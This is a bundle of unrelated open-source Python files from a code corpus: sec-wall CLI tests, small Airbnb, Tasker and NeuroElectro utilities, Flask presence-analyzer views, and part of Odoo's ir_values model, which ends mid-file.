raw_input()
|
opensvn/test
|
src/study/python/cpp/ch06/alt/insertVsColonZero.py
|
Python
|
gpl-2.0
| 442
|
# -*- coding: utf-8 -*-
"""
Copyright (C) 2010 Dariusz Suchojad <dsuch at gefira.pl>
Licensed under LGPLv3, see LICENSE.txt for terms and conditions.
"""
from __future__ import absolute_import, division, print_function, unicode_literals
# stdlib
import glob, imp, itertools, os, tempfile, shutil, subprocess, unittest, uuid
# nose
from nose.tools import assert_raises, assert_true, eq_
# textfixtures
from testfixtures import Replacer
# mock
from mock import Mock, mocksignature, patch
# Spring Python
from springpython.context import ApplicationContext
# sec-wall
from secwall import app_context, cli, server
class _BaseTestCase(unittest.TestCase):
""" A base class for all CLI-related test cases.
"""
temp_dir_prefix = 'tmp-sec-wall-'
def tearDown(self):
temp_dir = tempfile.gettempdir()
pattern = os.path.join(temp_dir, self.temp_dir_prefix) + '*'
temp_dirs = glob.glob(pattern)
for temp_dir in temp_dirs:
shutil.rmtree(temp_dir)
class CommandTestCase(_BaseTestCase):
""" Tests for the secwall.cli._Command class.
"""
def setUp(self):
self.app_ctx = ApplicationContext(app_context.SecWallContext())
self.test_dir = tempfile.mkdtemp(prefix=self.temp_dir_prefix)
open(os.path.join(self.test_dir, '.sec-wall-config'), 'w')
open(os.path.join(self.test_dir, 'config.py'), 'w')
open(os.path.join(self.test_dir, 'zdaemon.conf'), 'w')
def test_defaults(self):
""" Tests the correct values of the default class-level objects.
"""
eq_(cli._Command.needs_config_mod, True)
eq_(cli._Command._config_marker, '.sec-wall-config')
def test_command_init(self):
""" Tests the cli._Command.__init__ method.
"""
try:
cli._Command(uuid.uuid4().hex, self.app_ctx, False)
except SystemExit, e:
eq_(e.code, 3)
else:
raise Exception('Expected a SystemExit here')
def test_command_not_stop(self):
""" Tests whether executing a command other that 'stop' returns the
process' PID.
"""
expected_pid = uuid.uuid4().int
with patch.object(cli._Command, '_execute_zdaemon_command') as mock_method:
# Any command other than 'stop'. Should simply return the pid
# of the subprocess.
command_name = uuid.uuid4().hex
mock_method.return_value = expected_pid
command = cli._Command(self.test_dir, self.app_ctx, False)
given_pid = command._zdaemon_command(command_name, 'foo.conf')
eq_(given_pid, expected_pid)
eq_(mock_method.called, True)
mock_method.assert_called_with(
[u'zdaemon', u'-C', os.path.join(self.test_dir, 'foo.conf'), command_name])
def test_command_stop(self):
""" Tests whether executing a 'stop' command deletes a temporary zdaemon's
config file.
"""
expected_pid = uuid.uuid4().int
with patch.object(cli._Command, '_execute_zdaemon_command') as mock_method:
# The 'stop' command. Not only does it communicate with
# the subprocesses but also deleted the zdaemon's config file
# created in the self.setUp method.
command = cli._Command(self.test_dir, self.app_ctx, False)
command._zdaemon_command('stop', 'zdaemon.conf')
exists = os.path.exists(os.path.join(self.test_dir, 'zdaemon.conf'))
eq_(exists, False)
def test_wait_none(self):
""" Tests whether an Exception is being raised when the return value
of the .wait call is None.
"""
# The return code of the 'wait' call on a Popen object returned None.
# Doesn't even matter that there were too few arguments in the call
# to 'zdaemon' command as we hadn't even got as far as to actually call
# it.
with Replacer() as r:
def _wait(self):
self.returncode = None
r.replace('subprocess.Popen.wait', _wait)
try:
command = cli._Command(self.test_dir, self.app_ctx, False)
command._execute_zdaemon_command(['zdaemon'])
except Exception, e:
eq_(e.args[0], 'Could not execute command [u\'zdaemon\'] (p.returncode is None)')
else:
raise Exception('An exception was expected here.')
def test_too_few_arguments(self):
""" Tests the expected exception and the return code when there are
too few arguments passed in to 'zdaemon' command.
"""
# Too few arguments to the 'zdaemon' command.
with Replacer() as r:
stdout = uuid.uuid4().hex
stderr = uuid.uuid4().hex
def _communicate(self):
return [stdout, stderr]
r.replace('subprocess.Popen.communicate', _communicate)
try:
command = cli._Command(self.test_dir, self.app_ctx, False)
command._execute_zdaemon_command(['zdaemon'])
except Exception, e:
msg = e.args[0]
expected_start = 'Failed to execute command [u\'zdaemon\']. return code=['
expected_end = '], stdout=[{0}], stderr=[{1}]'.format(stdout, stderr)
assert_true(msg.startswith(expected_start))
assert_true(msg.endswith(expected_end))
return_code = msg[len(expected_start):-len(expected_end)]
# We caught an error so the return_code must be a positive integer.
return_code = int(return_code)
assert_true(return_code > 0)
else:
raise Exception('An exception was expected here.')
def test_pid_returning(self):
""" Tests whether the correct PID is being returned by the
'_execute_zdaemon_command' method.
"""
with Replacer() as r:
expected_pid = 4893
stdout = 'program running; pid={0}'.format(expected_pid)
stderr = uuid.uuid4().hex
def _communicate(self):
return [stdout, stderr]
def _Popen(self, *ignored_args, **ignored_kwargs):
class _DummyPopen(object):
def __init__(self, *ignored_args, **ignored_kwargs):
self.returncode = 0
def communicate(self):
return stdout, stderr
def wait(self):
pass
return _DummyPopen()
r.replace('subprocess.Popen', _Popen)
command = cli._Command(self.test_dir, self.app_ctx, False)
given_pid = int(command._execute_zdaemon_command(['zdaemon']))
# PIDs must be the same.
eq_(given_pid, expected_pid)
def test_enrichment(self):
""" Tests whether enrichment of the config module works fine.
"""
command = cli._Command(self.test_dir, self.app_ctx, False)
config_mod = command._get_config_mod()
elems = [elem for elem in dir(config_mod) if not elem.startswith('__')]
eq_(len(elems), 27)
names = ('server_type', 'host', 'port', 'log', 'crypto_dir', 'keyfile',
'certfile', 'ca_certs', 'not_authorized', 'forbidden',
'no_url_match', 'internal_server_error', 'validation_precedence',
'client_cert_401_www_auth', 'syslog_facility', 'syslog_address', 'log_level', 'log_file_config',
'server_tag', 'instance_name', 'quote_path_info', 'quote_query_string',
'from_backend_ignore', 'add_invocation_id', 'sign_invocation_id',
'default_url_config', 'add_default_if_not_found')
for name in names:
assert_true(name in elems, (name,))
def test_run_not_implemented_error(self):
""" Tests whether the default implementation of the .run method raises
a NotImplementedError.
"""
# The 'run' method must be implemented by subclasses.
command = cli._Command(self.test_dir, self.app_ctx, False)
assert_raises(NotImplementedError, command.run)
def test_config_mod_missing(self):
""" A SystemExit should be raised when the config directory doesn't
contain a config marker file.
"""
command = cli._Command(self.test_dir, self.app_ctx, False)
command.config_dir = tempfile.mkdtemp(prefix=self.temp_dir_prefix)
try:
command._get_config_mod()
except SystemExit, e:
return_code = e.args[0]
eq_(int(return_code), 3)
else:
raise Exception('Expected a SystemExit here')
class InitTestCase(_BaseTestCase):
""" Tests for the secwall.cli.Init class.
"""
def setUp(self):
self.app_ctx = ApplicationContext(app_context.SecWallContext())
self.test_dir = tempfile.mkdtemp(prefix='tmp-sec-wall-')
def test_defaults(self):
""" Tests the class-level defaults.
"""
eq_(cli.Init.needs_config_mod, False)
def test_run_dir_non_empty(self):
""" Running the command in a non-empty dir should result in an
exception being raised.
"""
open(os.path.join(self.test_dir, uuid.uuid4().hex), 'w').close()
init = cli.Init(self.test_dir, self.app_ctx, False)
try:
init.run()
except SystemExit, e:
return_code = e.args[0]
eq_(int(return_code), 3)
else:
raise Exception('Expected a SystemExit here')
def test_run_dir_empty(self):
""" Simulates the actual user's executing the command in an empty
directory and tests whether the files created by the command are fine.
"""
init = cli.Init(self.test_dir, self.app_ctx, False)
init.run()
f, p, d = imp.find_module('config', [self.test_dir])
config_mod = imp.load_module('config', f, p, d)
instance_secret = getattr(config_mod, 'INSTANCE_SECRET')
cur_dir = getattr(config_mod, 'cur_dir')
keyfile = getattr(config_mod, 'keyfile')
certfile = getattr(config_mod, 'certfile')
ca_certs = getattr(config_mod, 'ca_certs')
default_handler = getattr(config_mod, 'default')
urls = getattr(config_mod, 'urls')
# Instance secret is a UUID4 by default
eq_(len(instance_secret), 32)
eq_(uuid.UUID(instance_secret, version=4).hex, instance_secret)
eq_(cur_dir, self.test_dir)
eq_(os.path.normpath(keyfile), os.path.join(self.test_dir, 'crypto', 'server-priv.pem'))
eq_(os.path.normpath(certfile), os.path.join(self.test_dir, 'crypto', 'server-cert.pem'))
eq_(os.path.normpath(ca_certs), os.path.join(self.test_dir, 'crypto', 'ca-cert.pem'))
default_config = default_handler()
eq_(len(default_config), 4)
eq_(default_config['ssl'], True)
eq_(default_config['ssl-cert'], True)
eq_(default_config['ssl-cert-commonName'], instance_secret)
eq_(default_config['host'], 'http://' + instance_secret)
eq_(urls, [('/*', default_config),])
class StartTestCase(_BaseTestCase):
""" Tests for the secwall.cli.Start class.
"""
def setUp(self):
self.app_ctx = ApplicationContext(app_context.SecWallContext())
self.test_dir = tempfile.mkdtemp(prefix='tmp-sec-wall-')
cli.Init(self.test_dir, self.app_ctx, False).run()
def test_run_invalid_server_type(self):
""" The config's server type is of invalid type (should be either 'http'
or 'https').
"""
start = cli.Start(self.test_dir, self.app_ctx, False)
setattr(start.config_mod, 'server_type', uuid.uuid4().hex)
try:
start.run()
except SystemExit, e:
return_code = e.args[0]
eq_(int(return_code), 3)
else:
raise Exception('Expected a SystemExit here')
def test_missing_https_options(self):
""" Several crypto-related files must always be present if the config's
server_type is 'https'.
"""
os.mkdir(os.path.join(self.test_dir, 'crypto'))
valid_combinations = [
os.path.join(self.test_dir, 'crypto', 'server-priv.pem'),
os.path.join(self.test_dir, 'crypto', 'server-cert.pem'),
os.path.join(self.test_dir, 'crypto', 'ca-cert.pem')
]
for invalid_dimension in range(len(valid_combinations)):
invalid_combinations = list(itertools.combinations(valid_combinations, invalid_dimension))
for invalid_combination in invalid_combinations:
for file_name in invalid_combination:
open(file_name, 'w')
start = cli.Start(self.test_dir, self.app_ctx, False)
setattr(start.config_mod, 'server_type', 'https')
try:
start.run()
except SystemExit, e:
return_code = e.args[0]
eq_(int(return_code), 3)
shutil.rmtree(os.path.join(self.test_dir, 'crypto'))
os.mkdir(os.path.join(self.test_dir, 'crypto'))
else:
msg = 'Expected a SystemExit here, invalid_combination=[{0}]'
msg = msg.format(invalid_combination)
raise Exception(msg)
def test_run_ok(self):
""" Tests whether starting a server off a valid config file works fine.
"""
test_dir = self.test_dir
with Replacer() as r:
def _zdaemon_command(self, zdaemon_command, conf_file):
eq_(zdaemon_command, 'start')
eq_(conf_file, os.path.join(test_dir, 'zdaemon.conf'))
r.replace('secwall.cli.Start._zdaemon_command', _zdaemon_command)
start = cli.Start(self.test_dir, self.app_ctx, False)
setattr(start.config_mod, 'server_type', 'http')
start.run()
crypto_files = [
os.path.join(self.test_dir, 'crypto', 'server-priv.pem'),
os.path.join(self.test_dir, 'crypto', 'server-cert.pem'),
os.path.join(self.test_dir, 'crypto', 'ca-cert.pem')
]
os.mkdir(os.path.join(self.test_dir, 'crypto'))
for name in crypto_files:
open(name, 'w').close()
setattr(start.config_mod, 'server_type', 'https')
start.run()
def test_prepare_config(self):
crypto_files = [
os.path.join(self.test_dir, 'crypto', 'server-priv.pem'),
os.path.join(self.test_dir, 'crypto', 'server-cert.pem'),
os.path.join(self.test_dir, 'crypto', 'ca-cert.pem')
]
os.mkdir(os.path.join(self.test_dir, 'crypto'))
for name in crypto_files:
open(name, 'w').close()
cli.prepare_config(self.test_dir, 1)
zdaemon_conf_loc = os.path.join(self.test_dir, 'zdaemon.conf')
eq_(True, os.path.exists(zdaemon_conf_loc))
class ForkTestCase(_BaseTestCase):
""" Tests for the secwall.cli.Fork class.
"""
def setUp(self):
self.app_ctx = ApplicationContext(app_context.SecWallContext())
self.test_dir = tempfile.mkdtemp(prefix='tmp-sec-wall-')
cli.Init(self.test_dir, self.app_ctx, False).run()
log_config = """
[loggers]
keys=root
[handlers]
keys=consoleHandler
[formatters]
keys=simpleFormatter
[logger_root]
level=DEBUG
handlers=consoleHandler
[handler_consoleHandler]
class=StreamHandler
level=DEBUG
formatter=simpleFormatter
args=(sys.stdout,)
"""
self.log_file_config = os.path.join(self.test_dir, uuid.uuid4().hex)
open(self.log_file_config, 'w').write(log_config)
def test_run(self):
""" Tests whether running the command works fine.
"""
with patch.object(server.HTTPProxy, 'serve_forever') as mock_method:
fork = cli.Fork(self.test_dir, self.app_ctx, False)
fork.run()
with patch.object(server.HTTPSProxy, 'serve_forever') as mock_method:
fork = cli.Fork(self.test_dir, self.app_ctx, True)
fork.run()
def test_logging(self):
""" Depending on what the configuration says, logging should be using
either syslog or a custom configuration file into which anything may go.
"""
with Replacer() as r:
def _file_config(*args, **kwargs):
eq_(args[0], self.log_file_config)
r.replace('logging.config.fileConfig', _file_config)
fork = cli.Fork(self.test_dir, self.app_ctx, False)
fork.config_mod.log_file_config = self.log_file_config
with patch.object(server.HTTPProxy, 'serve_forever') as mock_method:
fork.run()
# Clean up after the test, otherwise unrelated tests will see the
# changes made to the config module.
fork.config_mod.log_file_config = None
class StopTestCase(_BaseTestCase):
""" Tests for the secwall.cli.Stop class.
"""
def setUp(self):
self.app_ctx = ApplicationContext(app_context.SecWallContext())
self.test_dir = tempfile.mkdtemp(prefix='tmp-sec-wall-')
def test_run_ok(self):
""" Tests whether running the command with all files in their expected
locations.
"""
test_dir = self.test_dir
open(os.path.join(self.test_dir, 'zdaemon.conf'), 'w')
with Replacer() as r:
def _zdaemon_command(self, zdaemon_command, conf_file):
eq_(zdaemon_command, 'stop')
eq_(conf_file, os.path.join(test_dir, 'zdaemon.conf'))
r.replace('secwall.cli.Stop._zdaemon_command', _zdaemon_command)
stop = cli.Stop(self.test_dir, self.app_ctx, False)
stop.run()
def test_run_zdaemon_conf_missing(self):
""" Running the command with the 'zdaemon.conf' file missing should
result in a SystemExit being raised.
"""
stop = cli.Stop(self.test_dir, self.app_ctx, False)
try:
stop.run()
except SystemExit, e:
return_code = e.args[0]
eq_(int(return_code), 3)
else:
raise Exception('Expected a SystemExit here')
|
dsuch/sec-wall
|
code/tests/test_cli.py
|
Python
|
gpl-3.0
| 18,478
|
import bnbcalendar
from pprint import pprint
def calculate_total_revenue(calendar):
total = 0
for day, details in calendar.items():
if details["available"] is False:
total += details["price"]
return total
def calculate_revenue_for_listing(listing_id, start=None, end=None, adults=None):
if start is None or end is None:
calendar = bnbcalendar.get_calendar_for_next_year(property_id=listing_id)
else:
calendar = bnbcalendar.get_calendar_for_dates(property_id=listing_id,
start=start,
end=end)
total = calculate_total_revenue(calendar)
return total
if __name__ == "__main__":
#total = calculate_revenue_for_listing("4914702")
total = calculate_revenue_for_listing("16042826")
print(total)
|
mpresh/airbnb-tools
|
airbnb/system/finance.py
|
Python
|
mit
| 878
|
__author__ = "Brian Lenihan <brian.lenihan@gmail.com"
__copyright__ = "Copyright (c) 2012 Python for Android Project"
__license__ = "Apache License, Version 2.0"
import os
import logging
import androidhelper
"""
Create and set a new Tasker variable, display the variable's value in a Tasker
popup, and then clear the variable.
Misc / Allow External Access must be set in Tasker's prefs.
Tasker action code reference:
http://tasker.dinglisch.net/ActionCodes.java
"""
SET_VARIABLE = 547
CLEAR_VARIABLE = 549
POPUP = 550
logging.basicConfig(level=logging.INFO)
class Tasker(object):
def __init__(self):
self.droid = androidhelper.Android()
self.extras = dict(
version_number = '1.0',
task_name = 'tasker_demo.{}'.format(os.getpid()),
task_priority = 9)
self.actions = 0
def bundle(self, action, *args):
# Unused parameters are padded with False
args = list(args)
args.extend([False]*(6-len(args)))
self.actions += 1
self.extras.update(
{'action{}'.format(self.actions) : dict(
{'action' : action,
'arg:1' : args[0],
'arg:2' : args[1],
'arg:3' : args[2],
'arg:4' : args[3],
'arg:5' : args[4],
'arg:6' : args[5]})
})
def broadcast_intent(self):
intent = self.droid.makeIntent(
'net.dinglisch.androidhelper.tasker.ACTION_TASK', None, None, self.extras).result
logging.debug("-- {}".format(intent))
self.droid.sendBroadcastIntent(intent)
if __name__ == "__main__":
tasker = Tasker()
tasker.bundle(SET_VARIABLE, "%PY4A_DEMO", "Hello from python")
# Popup: String title, String text, String background image, Scene layout,
# Integer timeout, Boolean show over keyguard, Boolean condition
tasker.bundle(POPUP, "Tasker", "%PY4A_DEMO", "", "Popup", 5, True, False)
tasker.bundle(CLEAR_VARIABLE, "%PY4A_DEMO")
tasker.broadcast_intent()
|
gc313/Learning-Python
|
tasker_example.py
|
Python
|
lgpl-3.0
| 1,901
|
from neuroelectro import models as m
__author__ = 'stripathy'
def get_article_last_author(article):
"""
Gets the last author object from NeuroElectro DB given an article
"""
return get_article_author(article, author_position = -1)
def get_article_author(article, author_position = -1):
"""
Gets the author object from NeuroElectro DB given an article and requested author_position (0 index)
"""
author_list_str = article.author_list_str
if author_list_str is None:
return None
author_list = author_list_str.split(';')
last_author_str = author_list[author_position]
last_author_split_str = last_author_str.split()
last_author_last_name = last_author_split_str[:-1]
last_author_last_name = ' '.join(last_author_last_name)
try:
if len(last_author_split_str) > 1:
last_author_initials = last_author_split_str[-1]
author_ob = m.Author.objects.filter(last = last_author_last_name,
initials = last_author_initials,
article = article)[0]
else:
last_author_initials = None
author_ob = m.Author.objects.filter(last = last_author_last_name,
article = article)[0]
return author_ob
except IndexError:
#print 'Cant find author %s' % last_author_str
#cant_find_count += 1
#last_author_node_list.append(None)
return None
|
neuroelectro/neuroelectro_org
|
db_functions/author_search.py
|
Python
|
gpl-2.0
| 1,532
|
# -*- coding: utf-8 -*-
"""
Defines views.
"""
import locale
from calendar import day_abbr, month_name
from collections import OrderedDict
from flask import abort, make_response, redirect
from flask_mako import render_template
from mako.exceptions import TopLevelLookupException
from main import app
from utils import (
get_data,
get_dates,
get_server_config,
group_by_weekday,
jsonify,
mean,
total_hours,
work_hours
)
import logging
log = logging.getLogger(__name__) # pylint: disable=invalid-name
TEMPLATES = [
('presence_weekday.html', 'Presence weekday'),
('mean_time_weekday.html', 'Mean time weekday'),
('presence_start_end.html', 'Presence start-end'),
('presence_top_5.html', 'Top 5')
]
locale.setlocale(locale.LC_COLLATE, 'pl_PL.UTF-8')
@app.route('/', methods=['GET'])
def mainpage():
"""
Redirects to front page.
"""
return redirect('presence_weekday.html')
@app.route('/<string:template>', methods=['GET'])
def serve_template(template):
"""
Serves appropriate template by param.
"""
try:
return render_template(template, templates=TEMPLATES, current=template)
except TopLevelLookupException:
return make_response('page not fond', 404)
@app.route('/api/v1/photo_url/<int:user_id>', methods=['GET'])
@jsonify
def prepare_photo_url(user_id):
"""
Returns url for intranet api in order to get photo of given user.
"""
conf = get_server_config()
return '{}://{}/api/images/users/{}'.format(
conf['protocol'],
conf['host'],
user_id
)
@app.route('/api/v1/users', methods=['GET'])
@jsonify
def users_view():
"""
Users listing for dropdown.
"""
data = get_data()
users = [
{'user_id': i, 'name': data[i]['name']}
for i in data.keys()
]
return sorted(users, key=lambda k: k['name'], cmp=locale.strcoll)
@app.route('/api/v1/months', methods=['GET'])
@jsonify
def months_view():
"""
Years/months listing for dropdown.
"""
return get_dates()
@app.route('/api/v1/top_5/<string:month_year>', methods=['GET'])
@jsonify
def top_5(month_year):
"""
Returns top 5 employees of given month.
"""
try:
year, month = month_year.split('-')
except (IndexError, ValueError):
log.debug('%s is not a correct format!', month_year)
abort(404)
if len(year) < 4 or not year.isdigit() or month not in month_name:
log.debug('%s is not a correct format!', month_year)
abort(404)
data = get_data()
top_presence = OrderedDict()
top_presence = {
user: {
'total_hours': total_hours(data[user]['presence'], month, year),
'image': prepare_photo_url(user).data[1:-1],
'name': data[user]['name']
}
for user in data
}
top5 = list(OrderedDict(
sorted(
top_presence.items(),
key=lambda x: x[1]['total_hours'],
reverse=True
)
).items())[:5]
if not top5[0][1]['total_hours']:
log.debug('No data for year %s', year)
abort(404)
return top5
@app.route('/api/v1/mean_time_weekday/<int:user_id>', methods=['GET'])
@jsonify
def mean_time_weekday_view(user_id):
"""
Returns mean presence time of given user grouped by weekday.
"""
data = get_data()
if user_id not in data:
log.debug('User %s not found!', user_id)
abort(404)
if not len(data[user_id]['presence']):
return []
weekdays = group_by_weekday(data[user_id]['presence'])
result = [
(day_abbr[weekday], mean(intervals))
for weekday, intervals in enumerate(weekdays)
]
return result
@app.route('/api/v1/presence_weekday/<int:user_id>', methods=['GET'])
@jsonify
def presence_weekday_view(user_id):
"""
Returns total presence time of given user grouped by weekday.
"""
data = get_data()
if user_id not in data:
log.debug('User %s not found!', user_id)
abort(404)
if not len(data[user_id]['presence']):
return []
weekdays = group_by_weekday(data[user_id]['presence'])
result = [
(day_abbr[weekday], sum(intervals))
for weekday, intervals in enumerate(weekdays)
]
result.insert(0, ('Weekday', 'Presence (s)'))
return result
@app.route('/api/v1/presence_start_end/<int:user_id>', methods=['GET'])
@jsonify
def presence_start_end_view(user_id):
"""
Returns daily timespan working hours of given user.
"""
data = get_data()
if user_id not in data:
log.debug('User %s not found!', user_id)
abort(404)
if not len(data[user_id]['presence']):
return {}
start_times, end_times = work_hours(data[user_id]['presence'])
work_days = OrderedDict()
for i in xrange(7): # 7 days a week
work_days[day_abbr[i]] = {
'start_work': int(mean(start_times[i])),
'end_work': int(mean(end_times[i]))
}
return work_days
|
djallberto/presence-analyzer-anowak
|
src/presence_analyzer/views.py
|
Python
|
mit
| 5,040
|
# -*- coding: utf-8 -*-
# Part of Odoo. See LICENSE file for full copyright and licensing details.
import pickle
from openerp import tools
from openerp.osv import osv, fields
from openerp.exceptions import AccessError, MissingError
from openerp.tools.translate import _
EXCLUDED_FIELDS = set((
'report_sxw_content', 'report_rml_content', 'report_sxw', 'report_rml',
'report_sxw_content_data', 'report_rml_content_data', 'search_view', ))
#: Possible slots to bind an action to with :meth:`~.set_action`
ACTION_SLOTS = [
"client_action_multi", # sidebar wizard action
"client_print_multi", # sidebar report printing button
"client_action_relate", # sidebar related link
"tree_but_open", # double-click on item in tree view
"tree_but_action", # deprecated: same as tree_but_open
]
class ir_values(osv.osv):
"""Holds internal model-specific action bindings and user-defined default
field values. definitions. This is a legacy internal model, mixing
two different concepts, and will likely be updated or replaced in a
future version by cleaner, separate models. You should not depend
explicitly on it.
The purpose of each ``ir.values`` entry depends on its type, defined
by the ``key`` column:
* 'default': user-defined default values, used when creating new
records of this model:
* 'action': binding of an action to a particular *action slot* of
this model, making the action easily available in the user
interface for this model.
The ``key2`` column acts as a qualifier, further refining the type
of the entry. The possible values are:
* for 'default' entries: an optional condition restricting the
cases where this particular default value will be applicable,
or ``False`` for no condition
* for 'action' entries: the ``key2`` qualifier is one of the available
action slots, defining how this action can be invoked:
* ``'client_print_multi'`` for report printing actions that will
be available on views displaying items from this model
* ``'client_action_multi'`` for assistants (wizards) actions
that will be available in views displaying objects of this model
* ``'client_action_relate'`` for links towards related documents
that should be available in views displaying objects of this model
* ``'tree_but_open'`` for actions that will be triggered when
double-clicking an item from this model in a hierarchical tree view
Each entry is specific to a model (``model`` column), and for ``'actions'``
type, may even be made specific to a given record of that model when the
``res_id`` column contains a record ID (``False`` means it's global for
all records).
The content of the entry is defined by the ``value`` column, which may either
contain an arbitrary value, or a reference string defining the action that
should be executed.
.. rubric:: Usage: default values
The ``'default'`` entries are usually defined manually by the
users, and set by their UI clients calling :meth:`~.set_default`.
These default values are then automatically used by the
ORM every time a new record is about to be created, i.e. when
:meth:`~openerp.osv.osv.osv.default_get`
or :meth:`~openerp.osv.osv.osv.create` are called.
.. rubric:: Usage: action bindings
Business applications will usually bind their actions during
installation, and OpenERP UI clients will apply them as defined,
based on the list of actions included in the result of
:meth:`~openerp.osv.osv.osv.fields_view_get`,
or directly returned by explicit calls to :meth:`~.get_actions`.
"""
_name = 'ir.values'
def _value_unpickle(self, cursor, user, ids, name, arg, context=None):
res = {}
for record in self.browse(cursor, user, ids, context=context):
value = record[name[:-9]]
if record.key == 'default' and value:
# default values are pickled on the fly
try:
value = str(pickle.loads(value))
except Exception:
pass
res[record.id] = value
return res
def _value_pickle(self, cursor, user, id, name, value, arg, context=None):
if context is None:
context = {}
ctx = context.copy()
if self.CONCURRENCY_CHECK_FIELD in ctx:
del ctx[self.CONCURRENCY_CHECK_FIELD]
record = self.browse(cursor, user, id, context=context)
if record.key == 'default':
# default values are pickled on the fly
value = pickle.dumps(value)
self.write(cursor, user, id, {name[:-9]: value}, context=ctx)
def onchange_object_id(self, cr, uid, ids, object_id, context=None):
if not object_id: return {}
act = self.pool.get('ir.model').browse(cr, uid, object_id, context=context)
return {
'value': {'model': act.model}
}
def onchange_action_id(self, cr, uid, ids, action_id, context=None):
if not action_id: return {}
act = self.pool.get('ir.actions.actions').browse(cr, uid, action_id, context=context)
return {
'value': {'value_unpickle': act.type+','+str(act.id)}
}
_columns = {
'name': fields.char('Name', required=True),
'model': fields.char('Model Name', select=True, required=True,
help="Model to which this entry applies"),
# TODO: model_id and action_id should be read-write function fields
'model_id': fields.many2one('ir.model', 'Model (change only)', size=128,
help="Model to which this entry applies - "
"helper field for setting a model, will "
"automatically set the correct model name"),
'action_id': fields.many2one('ir.actions.actions', 'Action (change only)',
help="Action bound to this entry - "
"helper field for binding an action, will "
"automatically set the correct reference"),
'value': fields.text('Value', help="Default value (pickled) or reference to an action"),
'value_unpickle': fields.function(_value_unpickle, fnct_inv=_value_pickle,
type='text',
string='Default value or action reference'),
'key': fields.selection([('action','Action'),('default','Default')],
'Type', select=True, required=True,
help="- Action: an action attached to one slot of the given model\n"
"- Default: a default value for a model field"),
'key2' : fields.char('Qualifier', select=True,
help="For actions, one of the possible action slots: \n"
" - client_action_multi\n"
" - client_print_multi\n"
" - client_action_relate\n"
" - tree_but_open\n"
"For defaults, an optional condition"
,),
'res_id': fields.integer('Record ID', select=True,
help="Database identifier of the record to which this applies. "
"0 = for all records"),
'user_id': fields.many2one('res.users', 'User', ondelete='cascade', select=True,
help="If set, action binding only applies for this user."),
'company_id': fields.many2one('res.company', 'Company', ondelete='cascade', select=True,
help="If set, action binding only applies for this company")
}
_defaults = {
'key': 'action',
'key2': 'tree_but_open',
}
def _auto_init(self, cr, context=None):
super(ir_values, self)._auto_init(cr, context)
cr.execute('SELECT indexname FROM pg_indexes WHERE indexname = \'ir_values_key_model_key2_res_id_user_id_idx\'')
if not cr.fetchone():
cr.execute('CREATE INDEX ir_values_key_model_key2_res_id_user_id_idx ON ir_values (key, model, key2, res_id, user_id)')
def create(self, cr, uid, vals, context=None):
res = super(ir_values, self).create(cr, uid, vals, context=context)
self.clear_caches()
return res
def write(self, cr, uid, ids, vals, context=None):
res = super(ir_values, self).write(cr, uid, ids, vals, context=context)
self.clear_caches()
return res
def unlink(self, cr, uid, ids, context=None):
res = super(ir_values, self).unlink(cr, uid, ids, context=context)
self.clear_caches()
return res
def set_default(self, cr, uid, model, field_name, value, for_all_users=True, company_id=False, condition=False):
"""Defines a default value for the given model and field_name. Any previous
default for the same scope (model, field_name, value, for_all_users, company_id, condition)
will be replaced and lost in the process.
Defaults can be later retrieved via :meth:`~.get_defaults`, which will return
the highest priority default for any given field. Defaults that are more specific
have a higher priority, in the following order (highest to lowest):
* specific to user and company
* specific to user only
* specific to company only
* global to everyone
:param string model: model name
:param string field_name: field name to which the default applies
:param value: the default field value to set
:type value: any serializable Python value
:param bool for_all_users: whether the default should apply to everybody or only
the user calling the method
:param int company_id: optional ID of the company to which the default should
apply. If omitted, the default will be global. If True
is passed, the current user's company will be used.
:param string condition: optional condition specification that can be used to
restrict the applicability of the default values
(e.g. based on another field's value). This is an
opaque string as far as the API is concerned, but client
stacks typically use single-field conditions in the
form ``'key=stringified_value'``.
(Currently, the condition is trimmed to 200 characters,
so values that share the same first 200 characters always
match)
:return: id of the newly created ir.values entry
"""
if isinstance(value, unicode):
value = value.encode('utf8')
if company_id is True:
# should be company-specific, need to get company id
user = self.pool.get('res.users').browse(cr, uid, uid)
company_id = user.company_id.id
# remove existing defaults for the same scope
search_criteria = [
('key', '=', 'default'),
('key2', '=', condition and condition[:200]),
('model', '=', model),
('name', '=', field_name),
('user_id', '=', False if for_all_users else uid),
('company_id','=', company_id)
]
self.unlink(cr, uid, self.search(cr, uid, search_criteria))
return self.create(cr, uid, {
'name': field_name,
'value': pickle.dumps(value),
'model': model,
'key': 'default',
'key2': condition and condition[:200],
'user_id': False if for_all_users else uid,
'company_id': company_id,
})
def get_default(self, cr, uid, model, field_name, for_all_users=True, company_id=False, condition=False):
""" Return the default value defined for model, field_name, users, company and condition.
Return ``None`` if no such default exists.
"""
search_criteria = [
('key', '=', 'default'),
('key2', '=', condition and condition[:200]),
('model', '=', model),
('name', '=', field_name),
('user_id', '=', False if for_all_users else uid),
('company_id','=', company_id)
]
defaults = self.browse(cr, uid, self.search(cr, uid, search_criteria))
return pickle.loads(defaults[0].value.encode('utf-8')) if defaults else None
def get_defaults(self, cr, uid, model, condition=False):
"""Returns any default values that are defined for the current model and user,
(and match ``condition``, if specified), previously registered via
:meth:`~.set_default`.
Defaults are global to a model, not field-specific, but an optional
``condition`` can be provided to restrict matching default values
to those that were defined for the same condition (usually based
on another field's value).
Default values also have priorities depending on whom they apply
to: only the highest priority value will be returned for any
field. See :meth:`~.set_default` for more details.
:param string model: model name
:param string condition: optional condition specification that can be used to
restrict the applicability of the default values
(e.g. based on another field's value). This is an
opaque string as far as the API is concerned, but client
stacks typically use single-field conditions in the
form ``'key=stringified_value'``.
(Currently, the condition is trimmed to 200 characters,
so values that share the same first 200 characters always
match)
:return: list of default values tuples of the form ``(id, field_name, value)``
(``id`` is the ID of the default entry, usually irrelevant)
"""
# use a direct SQL query for performance reasons,
# this is called very often
query = """SELECT v.id, v.name, v.value FROM ir_values v
LEFT JOIN res_users u ON (v.user_id = u.id)
WHERE v.key = %%s AND v.model = %%s
AND (v.user_id = %%s OR v.user_id IS NULL)
AND (v.company_id IS NULL OR
v.company_id =
(SELECT company_id from res_users where id = %%s)
)
%s
ORDER BY v.user_id, u.company_id"""
params = ('default', model, uid, uid)
if condition:
query %= 'AND v.key2 = %s'
params += (condition[:200],)
else:
query %= 'AND v.key2 is NULL'
cr.execute(query, params)
# keep only the highest priority default for each field
defaults = {}
for row in cr.dictfetchall():
defaults.setdefault(row['name'],
(row['id'], row['name'], pickle.loads(row['value'].encode('utf-8'))))
return defaults.values()
# use ormcache: this is called a lot by BaseModel.default_get()!
@tools.ormcache('uid', 'model', 'condition')
